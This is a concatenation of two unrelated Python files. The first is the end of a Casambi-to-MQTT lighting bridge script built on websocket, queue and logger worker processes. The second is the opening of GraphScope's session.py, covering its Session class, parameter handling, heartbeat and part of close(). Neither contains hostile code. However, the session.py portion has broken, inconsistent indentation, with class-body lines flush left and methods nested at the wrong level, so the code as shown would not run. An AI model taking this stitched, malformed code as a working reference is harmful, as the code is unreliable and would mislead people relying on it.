    web_sock = casambi.ws_open_message(user_session_id=user_session_id, network_id=network_id, api_key=api_key)
    casambi.turn_unit_on(unit_id=unit_id, web_sock=web_sock, wire_id=wire_id)
    casambi.ws_close_message(web_sock=web_sock, wire_id=wire_id)
def casambi_worker(write_queue, command_queue, logger_queue, api_key, email, network_password, user_password, verbose=False):
    # Worker process: maintain a websocket to the casambi cloud.
    # - publishes the known unit table onto `write_queue` (towards MQTT)
    # - forwards control messages arriving on `command_queue` to casambi
    # Runs forever; the outer loop re-opens the websocket after disconnects.
    setproctitle('casambi_worker')
    worker_configurer(logger_queue)
    innerlogger = logging.getLogger('worker')
    user_session_id = casambi.create_user_session(email=email, api_key=api_key, user_password=user_password)
    network_ids = casambi.create_network_session(api_key=api_key, email=email, network_password=network_password)
    wire_id = 1
    # Only the first network of the account is handled.
    network_id = list(network_ids)[0]
    units = {}
    while(True):
        # Refresh the unit inventory before (re)opening the websocket.
        network_information = casambi.get_network_information(user_session_id=user_session_id, network_id=network_id, api_key=api_key)
        network_units = network_information['units']
        for key, value in network_units.items():
            unit_id = "{}".format(key)
            if unit_id in units:
                continue #already known
            unit = {}
            unit['name'] = (value['name']).strip()
            unit['value'] = 0 # Lets guess the unit is off
            units[unit_id] = unit
        innerlogger.debug("casambi_worker: units: {}".format(units))
        write_queue.put(units)
        web_sock = casambi.ws_open_message(user_session_id=user_session_id, network_id=network_id, api_key=api_key, wire_id=wire_id)
        # Short timeout so the loop can also poll the command queue.
        web_sock.settimeout(0.1)
        while(True):
            casambi_msg = None
            command_msgs = None
            try:
                casambi_msg = web_sock.recv()
            except websocket._exceptions.WebSocketConnectionClosedException:
                innerlogger.info("casambi_worker: Socket closed, reopening")
                break
            except socket.timeout:
                # No data this tick; fall through to command handling.
                pass
            except websocket._exceptions.WebSocketTimeoutException:
                pass
            except TimeoutError:
                innerlogger.info("casambi_worker: Socket closed, reopening")
                break
            try:
                command_msgs = command_queue.get(block=False)
            except queue.Empty:
                pass
            if command_msgs:
                # Forward MQTT-originated commands to casambi as controlUnit.
                for message in command_msgs:
                    value = message['value']
                    unit_id = message['id']
                    name = units[unit_id]['name']
                    innerlogger.debug("casambi_worker: recieved command message: \"{}\"".format(message))
                    #set_unit_value(api_key, email, network_password, user_password, unit_id)
                    #casambi.set_unit_value(web_sock=web_sock, unit_id=unit_id, value=value, wire_id=wire_id)
                    target_controls = { 'Dimmer': {'value': value }}
                    casambi_message = {
                        "wire": wire_id,
                        "method": 'controlUnit',
                        "id": int(unit_id),
                        "targetControls": target_controls
                    }
                    json_msg = json.dumps(casambi_message)
                    web_sock.send(json_msg)
                    innerlogger.debug("casambi_worker: target_controls: {} casambi_message: {} json_msg {}".format(target_controls, casambi_message, json_msg))
            if (casambi_msg == '') or not casambi_msg:
                continue
            #result = __clean_up_json(msg=result)
            data = None
            try:
                data = json.loads(casambi_msg)
            except json.decoder.JSONDecodeError as err:
                innerlogger.error("casambi_worker: Caught exception, data: \"\n\n{}\n\n\", exception: {}".format(data, err))
                continue
            innerlogger.debug("casambi_worker: recieved data: {}".format(data))
            # 'controls': [{'type': 'Overheat', 'status': 'ok'}, {'type': 'Dimmer', 'value': 0.0}], 'sensors': [], 'method': 'unitChanged', 'online': False, 'id': 12, 'on': True, 'status': 'ok'}
            dimmer_value = 0
            unit_id = -1
            if 'controls' in data:
                controls = data['controls']
                for control in controls:
                    if control['type'] == 'Dimmer':
                        dimmer_value = control['value']
            if 'id' in data:
                unit_id = "{}".format(data['id'])
            if unit_id != -1:
                if (unit_id in units):
                    units[unit_id]['id'] = unit_id
                    units[unit_id]['value'] = dimmer_value
                # Push the updated unit table towards the MQTT worker.
                write_queue.put(units)
            else:
                innerlogger.debug("casambi_worker: unknown data: {}".format(data))
            innerlogger.debug("casambi_worker: units: {}".format(units))
def mqtt_worker(casambi_reader_queue, mqtt_request_queue, logger_queue, mqtt_server, mqtt_server_port, mqtt_user, mqtt_password, verbose=False):
    '''Bridge between the casambi worker and an MQTT broker.

    Publishes unit state on Home-Assistant-style topics and subscribes to
    the matching command topics, e.g.:

    - platform: mqtt
      name: "Spot köksö"
      state_topic: "casambi/light/7/status"
      command_topic: "casambi/light/7/switch"
      payload_off: "0"
      brightness_state_topic: 'casambi/light/7/brightness'
      brightness_command_topic: 'casambi/light/7/brightness/set'
      on_command_type: 'brightness'
    '''
    setproctitle('casambi_mqtt_worker')
    worker_configurer(logger_queue)
    innerlogger = logging.getLogger('worker')
    client = mqtt.Client()
    client.username_pw_set(mqtt_user, password=mqtt_password)
    topics = []
    client.on_connect = on_connect
    client.on_message = on_message
    client.user_data_set((topics, mqtt_request_queue, innerlogger))
    innerlogger.debug("mqtt_worker: Connecting to MQTT server {}:{}".format(mqtt_server, mqtt_server_port))
    # BUG FIX: the port was hard-coded to 1883 although mqtt_server_port is
    # configured (and logged above); honor the configured port.
    client.connect(mqtt_server, mqtt_server_port, 60)
    # Pump the MQTT network loop manually so the same process can also poll
    # the casambi queue (instead of client.loop_forever()).
    while(True):
        client.loop(.1)
        casambi_read_msg = None
        try:
            casambi_read_msg = casambi_reader_queue.get(block=True, timeout=.1)
        except queue.Empty:
            pass
        if casambi_read_msg:
            innerlogger.debug("mqtt_worker: Read following from Casambi queue: {}".format(casambi_read_msg))
            if isinstance(casambi_read_msg, dict):
                for id, item in casambi_read_msg.items():
                    topic_change = False
                    brightness = 0
                    name = item['name']
                    status_topic = "casambi/light/{}/status".format(id)
                    command_topic = "casambi/light/{}/switch".format(id)
                    brightness_state_topic = "casambi/light/{}/brightness".format(id)
                    brightness_command_topic = "casambi/light/{}/brightness/set".format(id)
                    name_topic = "casambi/light/{}/name".format(id)
                    if item['value'] == 0:
                        payload = 'OFF'
                    else:
                        payload = 'ON'
                        # casambi reports 0..1; MQTT brightness is 0..255.
                        brightness = round(item['value'] * 255)
                    innerlogger.debug("mqtt_worker: Sending topic=\"{}\" payload=\"{}\" (light name: {})".format(status_topic, payload, name))
                    client.publish(topic=status_topic, payload=payload)
                    client.publish(topic=brightness_state_topic, payload=brightness)
                    client.publish(topic=name_topic, payload=name)
                    # Subscribe once per newly discovered unit.
                    if not (command_topic in topics):
                        topics.append(command_topic)
                        innerlogger.debug("mqtt_worker: subscribing on topic=\"{}\"".format(command_topic))
                        client.subscribe(command_topic, qos=0)
                        topic_change = True
                    if not (brightness_command_topic in topics):
                        topics.append(brightness_command_topic)
                        innerlogger.debug("mqtt_worker: subscribing on topic=\"{}\"".format(brightness_command_topic))
                        client.subscribe(brightness_command_topic, qos=0)
                        topic_change = True
                    if topic_change:
                        # Refresh userdata so on_connect re-subscribes after a reconnect.
                        client.user_data_set((topics, mqtt_request_queue, innerlogger))
def on_message(client, userdata, message):
    """MQTT callback: translate an incoming command into casambi unit messages.

    Understands three topic shapes:
      casambi/light/<id>/switch           payload 'ON'/'OFF' or a raw 0..255 number
      casambi/light/<id>/brightness/set   payload 0..255
    Resulting messages ({'id': <str>, 'value': 0..1}) are put on the
    casambi command queue.
    """
    digit_regexp = re.compile(r'\d+')  # raw string: avoid invalid-escape warning
    payload = (message.payload).decode('UTF-8')
    (topics, mqtt_request_queue, innerlogger) = userdata
    # Off message:
    # Received message 'b'0'' on topic 'casambi/light/1/switch' with QoS 0
    # on_message: Received message 'b'255'' on topic 'casambi/light/12/brightness/set' with QoS 0
    innerlogger.debug("on_message: Received message '" + payload + "' on topic '"
                      + message.topic + "' with QoS " + str(message.qos))
    parts = (message.topic).split('/')
    unit_id = parts[2]
    messages = []
    if parts[-1] == 'switch' and (digit_regexp.match(payload)):
        unit = {}
        # Scale 0..255 MQTT value down to casambi's 0..1 range.
        unit['value'] = round(float(payload)/255, 1)
        unit['id'] = unit_id
        # BUG FIX: the original compared the float value against the *strings*
        # '1'/'0', which never matched; normalize numerically like the
        # brightness branch below.
        if unit['value'] == 1:
            unit['value'] = 1
        elif unit['value'] == 0:
            unit['value'] = 0
        messages.append(unit)
    elif parts[-1] == 'switch' and payload == "OFF":
        unit = {}
        unit['value'] = 0
        unit['id'] = unit_id
        messages.append(unit)
    elif parts[-1] == 'switch' and payload == "ON":
        unit = {}
        unit['value'] = 1
        unit['id'] = unit_id
        messages.append(unit)
    elif parts[-1] == 'set' and parts[-2] == 'brightness':
        unit = {}
        unit['value'] = round(float(payload)/255, 1)
        unit['id'] = unit_id
        # Snap full-on / full-off to exact integers.
        if unit['value'] == 1:
            unit['value'] = 1
        elif unit['value'] == 0:
            unit['value'] = 0
        messages.append(unit)
    else:
        innerlogger.debug("on_message: unhandled message '" + payload + "' on topic '"
                          + message.topic + "' with QoS " + str(message.qos))
    innerlogger.debug("on_message: unit_id: {} parts: {} messages: {}".format(unit_id, parts, messages))
    if len(messages) != 0:
        innerlogger.debug("on_message: putting following messages on queue: {}".format(messages))
        mqtt_request_queue.put(messages)
def on_connect(client, userdata, flags, rc):
    """MQTT callback: (re)subscribe after every (re)connection.

    Subscribing here (rather than once at startup) means subscriptions
    survive broker reconnects.
    """
    topics, _request_queue, innerlogger = userdata
    innerlogger.debug("on_connect: Connected with result code " + str(rc))
    # Base topic first, then every previously discovered command topic.
    client.subscribe('casambi', qos=0)
    for topic in topics:
        innerlogger.debug("on_connect: subscribing on topic=\"{}\"".format(topic))
        client.subscribe(topic, qos=0)
def worker_configurer(queue):
    """Route this process's log records to the central logger process.

    Attaches a QueueHandler feeding *queue* (note: the parameter shadows
    the stdlib ``queue`` module, kept for interface compatibility) to the
    root logger and opens it up to DEBUG — filtering happens on the
    listener side.
    """
    queue_handler = logging.handlers.QueueHandler(queue)
    root_logger = logging.getLogger()
    root_logger.addHandler(queue_handler)
    root_logger.setLevel(logging.DEBUG)
def listener_configurer(verbose=False):
    """Attach a console handler to the root logger for the listener process.

    Level is DEBUG when *verbose*, else INFO.
    """
    root_logger = logging.getLogger()
    console_handler = logging.StreamHandler()
    console_handler.setFormatter(logging.Formatter(
        '%(asctime)s %(process)d %(processName)-10s %(name)-8s %(levelname)-8s %(message)s'))
    root_logger.addHandler(console_handler)
    root_logger.setLevel(logging.DEBUG if verbose else logging.INFO)
def logger_worker(queue, verbose):
    # Dedicated process: drain log records queued by the worker processes
    # and dispatch them through the locally configured root logger.
    # Runs forever; started as a separate multiprocessing.Process by main().
    setproctitle('casambi_logger')
    listener_configurer(verbose=verbose)
    while True:
        # Busy-drain then back off; queue.empty() is racy but acceptable here.
        while not queue.empty():
            record = queue.get()
            logger = logging.getLogger(record.name)
            logger.handle(record) # No level or filter logic applied - just do it!
        sleep(0.5)
def main():
    # Read the YAML configuration, then spawn the three cooperating
    # processes: casambi worker, MQTT bridge and the central logger.
    verbose = False
    config = parse_config()
    api_key = config['api_key']
    email = config['email']
    network_password = config['network_password']
    user_password = config['user_password']
    mqtt_password = config['mqtt_password']
    mqtt_server = config['mqtt_server']
    mqtt_server_port = config['mqtt_server_port']
    mqtt_user = config['mqtt_user']
    if 'verbose' in config:
        verbose = config['verbose']
    # Queues wire the processes together: casambi -> mqtt state updates,
    # mqtt -> casambi commands, and every process -> logger records.
    casambi_reader_queue = multiprocessing.Queue()
    mqtt_request_queue = multiprocessing.Queue()
    logger_queue = multiprocessing.Queue()
    casambi_process = multiprocessing.Process(target=casambi_worker, args=(casambi_reader_queue, mqtt_request_queue, logger_queue, api_key, email, network_password, user_password, verbose), name='Casambi')
    #casambi_process.daemon=True
    casambi_process.start()
    mqtt_process = multiprocessing.Process(target=mqtt_worker, args=(casambi_reader_queue, mqtt_request_queue, logger_queue, mqtt_server, mqtt_server_port, mqtt_user, mqtt_password, verbose), name='MQTT')
    #mqtt_process.daemon=True
    mqtt_process.start()
    logger_process = multiprocessing.Process(target=logger_worker, args=(logger_queue, verbose), name='Logger')
    #logger_process.daemon=True
    logger_process.start()
if __name__ == "__main__":
    # Script entry point: spawn the casambi, MQTT and logger processes.
    main()
|
session.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import copy
import json
import logging
import os
import random
import sys
import threading
import time
import warnings
from queue import Empty as EmptyQueue
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.errors import ConnectionError
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import GRPCError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.errors import LearningEngineInternalError
from graphscope.framework.errors import check_argument
from graphscope.framework.graph import Graph
from graphscope.framework.operation import Operation
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
# Path of the user-level session config; overridable via GS_CONFIG_PATH.
DEFAULT_CONFIG_FILE = os.environ.get(
    "GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
# Registry of live sessions (populated elsewhere in this module).
_session_dict = {}
logger = logging.getLogger("graphscope")
class Session(object):
"""A class for interacting with GraphScope graph computation service cluster.
A :class:`Session` object encapsulates the environment in which :class:`Operation`
objects are executed/evaluated.
A session may own resources. It is important to release these resources when
they are no longer required. To do this, invoke the :meth:`close` method
on the session.
A Session can register itself as default session with :meth:`as_default`, and all operations
after that will use the default session. Session deregister itself as a default session
when closed.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> # use session object explicitly
>>> sess = gs.session()
>>> g = sess.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = s.sssp(g, 4)
>>> s.close()
>>> # or use a session as default
>>> s = gs.session().as_default()
>>> g = g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(pg, 4)
>>> s.close()
We support setup a service cluster and create a RPC session in following ways:
- GraphScope graph computation service run in cluster managed by kubernetes.
>>> s = graphscope.session()
Also, :class:`Session` provides several keyword params for users to define the cluster.
You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
you can find all params detail in :meth:`__init__` method.
>>> s = graphscope.session(
... k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
... k8s_vineyard_cpu=0.1,
... k8s_vineyard_mem="256Mi",
... vineyard_shared_mem="4Gi",
... k8s_engine_cpu=0.1,
... k8s_engine_mem="256Mi")
- or all params can be provided by a json configuration file or configuration dict.
>>> s = graphscope.session(config='/tmp/config.json')
>>> # Or
>>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
"""
@set_defaults(gs_config)
def __init__(
    self,
    config=None,
    cluster_type=gs_config.cluster_type,
    addr=gs_config.addr,
    num_workers=gs_config.num_workers,
    preemptive=gs_config.preemptive,
    k8s_namespace=gs_config.k8s_namespace,
    k8s_service_type=gs_config.k8s_service_type,
    k8s_gs_image=gs_config.k8s_gs_image,
    k8s_etcd_image=gs_config.k8s_etcd_image,
    k8s_gie_graph_manager_image=gs_config.k8s_gie_graph_manager_image,
    k8s_zookeeper_image=gs_config.k8s_zookeeper_image,
    k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
    k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
    k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
    k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
    k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
    k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
    k8s_etcd_mem=gs_config.k8s_etcd_mem,
    k8s_zookeeper_cpu=gs_config.k8s_zookeeper_cpu,
    k8s_zookeeper_mem=gs_config.k8s_zookeeper_mem,
    k8s_gie_graph_manager_cpu=gs_config.k8s_gie_graph_manager_cpu,
    k8s_gie_graph_manager_mem=gs_config.k8s_gie_graph_manager_mem,
    k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
    k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
    k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
    vineyard_shared_mem=gs_config.vineyard_shared_mem,
    k8s_engine_cpu=gs_config.k8s_engine_cpu,
    k8s_engine_mem=gs_config.k8s_engine_mem,
    k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
    k8s_mars_worker_mem=gs_config.mars_worker_mem,
    k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
    k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
    k8s_volumes=gs_config.k8s_volumes,
    k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
    timeout_seconds=gs_config.timeout_seconds,
    dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
    with_mars=gs_config.with_mars,
    **kw
):
    """Construct a new GraphScope session.

    Args:
        config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
            For str, it will identify it as a path and read the configuration file to build a
            session if file exist. If not specified, the global default configuration
            :code:`DEFAULT_CONFIG_FILE` will be used, which get value of GS_CONFIG_PATH
            in environment. Note that it will overwrite explicit parameters. Defaults to None.
        addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
            A new session id will be generated for each session connection.
        cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
            Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
        num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
        preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
            as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
            which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
            same value.
        k8s_namespace (str, optional): Contains the namespace to create all resource inside.
            If param missing, it will try to read namespace from kubernetes context, or
            a random namespace will be created and deleted if namespace not exist.
            Defaults to None.
        k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
            Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
        k8s_gs_image (str, optional): The GraphScope engine's image.
        k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
        k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
        k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
        k8s_gie_graph_manager_image (str, optional): The GraphScope interactive engine's graph manager image.
        k8s_zookeeper_image (str, optional): The image of zookeeper, which used by GIE graph manager.
        k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
            discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
            a bundled vineyard container otherwise.
        k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
        k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
        vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
        k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
        k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
        k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
        k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
        k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
        k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
        k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
        k8s_zookeeper_cpu (float, optional):
            Minimum number of CPU cores request for zookeeper container. Defaults to 0.5.
        k8s_zookeeper_mem (str, optional):
            Minimum number of memory request for zookeeper container. Defaults to '256Mi'.
        k8s_gie_graph_manager_cpu (float, optional):
            Minimum number of CPU cores request for graphmanager container. Defaults to 1.0.
        k8s_gie_graph_manager_mem (str, optional):
            Minimum number of memory request for graphmanager container. Defaults to '4Gi'.
        k8s_mars_worker_cpu (float, optional):
            Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
        k8s_mars_worker_mem (str, optional):
            Minimum number of memory request for mars worker container. Defaults to '4Gi'.
        k8s_mars_scheduler_cpu (float, optional):
            Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
        k8s_mars_scheduler_mem (str, optional):
            Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
        with_mars (bool, optional):
            Launch graphscope with mars. Defaults to False.
        k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
            containers in a pod. Defaults to {}.

            For example, you can mount host path with:

            k8s_volumes = {
                "my-data": {
                    "type": "hostPath",
                    "field": {
                        "path": "<path>",
                        "type": "Directory"
                    },
                    "mounts": [
                        {
                            "mountPath": "<path1>"
                        },
                        {
                            "mountPath": "<path2>"
                        }
                    ]
                }
            }

            Or you can mount PVC with:

            k8s_volumes = {
                "my-data": {
                    "type": "persistentVolumeClaim",
                    "field": {
                        "claimName": "your-pvc-name"
                    },
                    "mounts": [
                        {
                            "mountPath": "<path1>"
                        }
                    ]
                }
            }

            Also, you can mount a single volume with:

            k8s_volumes = {
                "my-data": {
                    "type": "hostPath",
                    "field": {xxx},
                    "mounts": {
                        "mountPath": "<path1>"
                    }
                }
            }

        timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
            k8s_waiting_for_delete is True).
        dangling_timeout_seconds (int, optional): After seconds of client disconnect,
            coordinator will kill this graphscope instance. Defaults to 600.
            Expect this value to be greater than 5 (heartbeat interval).
            Disable dangling check by setting -1.
        k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
        **kw (dict, optional): Other optional parameters will be put to :code:`**kw`.

            - k8s_minikube_vm_driver: Deprecated.
            - k8s_client_config (dict, optional):
                Provide configurable parameters for connecting to remote k8s,
                which strongly relies on the `kube_config.new_client_from_config` function.
                eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
                config_file: Name of the kube-config file.
                context: set the active context. If is set to None, current_context from config file will be used.
                persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
            - log_level: Deprecated.
                Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
            - show_log: Deprecated.
                Move this param as a global configuration.Set via `graphscope.set_option(show_log=True)`
            - k8s_vineyard_shared_mem: Deprecated.
                Please use vineyard_shared_mem instead.

    Raises:
        TypeError: If the given argument combination is invalid and cannot be used to create
            a GraphScope session.
    """
    num_workers = int(num_workers)
    self._config_params = {}
    self._accessable_params = (
        "addr",
        "cluster_type",
        "num_workers",
        "preemptive",
        "k8s_namespace",
        "k8s_service_type",
        "k8s_gs_image",
        "k8s_etcd_image",
        "k8s_image_pull_policy",
        "k8s_image_pull_secrets",
        "k8s_gie_graph_manager_image",
        "k8s_zookeeper_image",
        "k8s_coordinator_cpu",
        "k8s_coordinator_mem",
        "k8s_etcd_num_pods",
        "k8s_etcd_cpu",
        "k8s_etcd_mem",
        "k8s_zookeeper_cpu",
        "k8s_zookeeper_mem",
        "k8s_gie_graph_manager_cpu",
        "k8s_gie_graph_manager_mem",
        "k8s_vineyard_daemonset",
        "k8s_vineyard_cpu",
        "k8s_vineyard_mem",
        "vineyard_shared_mem",
        "k8s_engine_cpu",
        "k8s_engine_mem",
        "k8s_mars_worker_cpu",
        "k8s_mars_worker_mem",
        "k8s_mars_scheduler_cpu",
        "k8s_mars_scheduler_mem",
        "with_mars",
        "k8s_volumes",
        "k8s_waiting_for_delete",
        "timeout_seconds",
        "dangling_timeout_seconds",
    )
    saved_locals = locals()
    for param in self._accessable_params:
        self._config_params[param] = saved_locals[param]
    # parse config, which should be a path to config file, or dict
    # config has highest priority
    if isinstance(config, dict):
        self._config_params.update(config)
    elif isinstance(config, str):
        self._load_config(config, False)
    elif DEFAULT_CONFIG_FILE:
        self._load_config(DEFAULT_CONFIG_FILE)
    # update other optional params
    self._config_params.update(kw)
    # initial setting of cluster_type
    self._cluster_type = self._parse_cluster_type()
    # mars cannot work with run-on-local mode
    if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
        raise NotImplementedError(
            "Mars cluster cannot be launched along with local GraphScope deployment"
        )
    # deprecated params handle
    if "show_log" in kw:
        warnings.warn(
            "The `show_log` parameter has been deprecated and has no effect, "
            "please use `graphscope.set_option(show_log=%s)` instead."
            % kw.pop("show_log", None),
            category=DeprecationWarning,
        )
    if "log_level" in kw:
        # BUG FIX: this branch previously popped "show_log" instead of
        # "log_level", so `log_level` stayed in kw and triggered the
        # "Not recognized value" ValueError below.
        warnings.warn(
            "The `log_level` parameter has been deprecated and has no effect, "
            "please use `graphscope.set_option(log_level=%r)` instead."
            % kw.pop("log_level", None),
            category=DeprecationWarning,
        )
    if "k8s_vineyard_shared_mem" in kw:
        # BUG FIX: the old message had no format placeholder but was still
        # %-formatted with the popped value, raising TypeError whenever
        # this deprecated kwarg was passed.
        kw.pop("k8s_vineyard_shared_mem", None)
        warnings.warn(
            "The `k8s_vineyard_shared_mem` has been deprecated and has no effect, "
            "please use `vineyard_shared_mem` instead.",
            category=DeprecationWarning,
        )
    # update k8s_client_config params
    self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
    # There should be no more custom keyword arguments.
    if kw:
        raise ValueError("Not recognized value: ", list(kw.keys()))
    if self._config_params["addr"]:
        logger.info(
            "Connecting graphscope session with address: %s",
            self._config_params["addr"],
        )
    else:
        logger.info(
            "Initializing graphscope session with parameters: %s",
            self._config_params,
        )
    self._closed = False
    # coordinator service endpoint
    self._coordinator_endpoint = None
    self._launcher = None
    self._heartbeat_sending_thread = None
    self._grpc_client = None
    self._session_id = None  # unique identifier across sessions
    # engine config:
    #
    #   {
    #       "experiment": "ON/OFF",
    #       "vineyard_socket": "...",
    #       "vineyard_rpc_endpoint": "..."
    #   }
    self._engine_config = None
    # interactive instance related graph map
    self._interactive_instance_dict = {}
    # learning engine related graph map
    self._learning_instance_dict = {}
    self._default_session = None
    atexit.register(self.close)
    # create and connect session
    with CaptureKeyboardInterrupt(self.close):
        self._connect()
    self._disconnected = False
    # heartbeat
    self._heartbeat_interval_seconds = 5
    self._heartbeat_sending_thread = threading.Thread(
        target=self._send_heartbeat, args=()
    )
    self._heartbeat_sending_thread.daemon = True
    self._heartbeat_sending_thread.start()
    def __repr__(self):
        # Printing a session shows its live status/resource dict (see `info`).
        return str(self.info)
    def __str__(self):
        # str() and repr() are intentionally identical for sessions.
        return repr(self)
    @property
    def session_id(self):
        """str: Unique identifier of this session across all sessions.

        ``None`` until the gRPC handshake in ``_connect`` completes.
        """
        return self._session_id
def _load_config(self, path, slient=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
if not slient:
raise exp
def _parse_cluster_type(self):
if self._config_params["addr"] is not None:
# get the cluster type after connecting
return types_pb2.UNDEFINED
else:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
return types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
return types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
    @property
    def engine_config(self):
        """dict: Engine configuration associated with this session.

        Populated during :meth:`_connect`; ``None`` before the session
        is established.
        """
        return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
def _send_heartbeat(self):
while not self._closed:
if self._grpc_client:
try:
self._grpc_client.send_heartbeat()
except GRPCError as exc:
logger.warning(exc)
self._disconnected = True
else:
self._disconnected = False
time.sleep(self._heartbeat_interval_seconds)
    def close(self):
        """Closes this session.
        This method frees all resources associated with the session.
        Safe to call multiple times; subsequent calls are no-ops.
        """
        # Idempotence guard; setting _closed also tells the heartbeat
        # daemon loop to exit on its next iteration.
        if self._closed:
            return
        self._closed = True
        self._coordinator_endpoint = None
        self._deregister_default()
        if self._heartbeat_sending_thread:
            # Bound the join by one heartbeat interval so close() never hangs.
            self._heartbeat_sending_thread.join(
                timeout=self._heartbeat_interval_seconds
            )
            self._heartbeat_sending_thread = None
        self._disconnected = True
        # close all interactive instances (best effort: engine errors ignored)
        for instance in self._interactive_instance_dict.values():
            try:
                if instance is not None:
                    instance.close()
            except InteractiveEngineInternalError:
                pass
        self._interactive_instance_dict.clear()
        # close all learning instances (best effort: engine errors ignored)
        for instance in self._learning_instance_dict.values():
            try:
                if instance is not None:
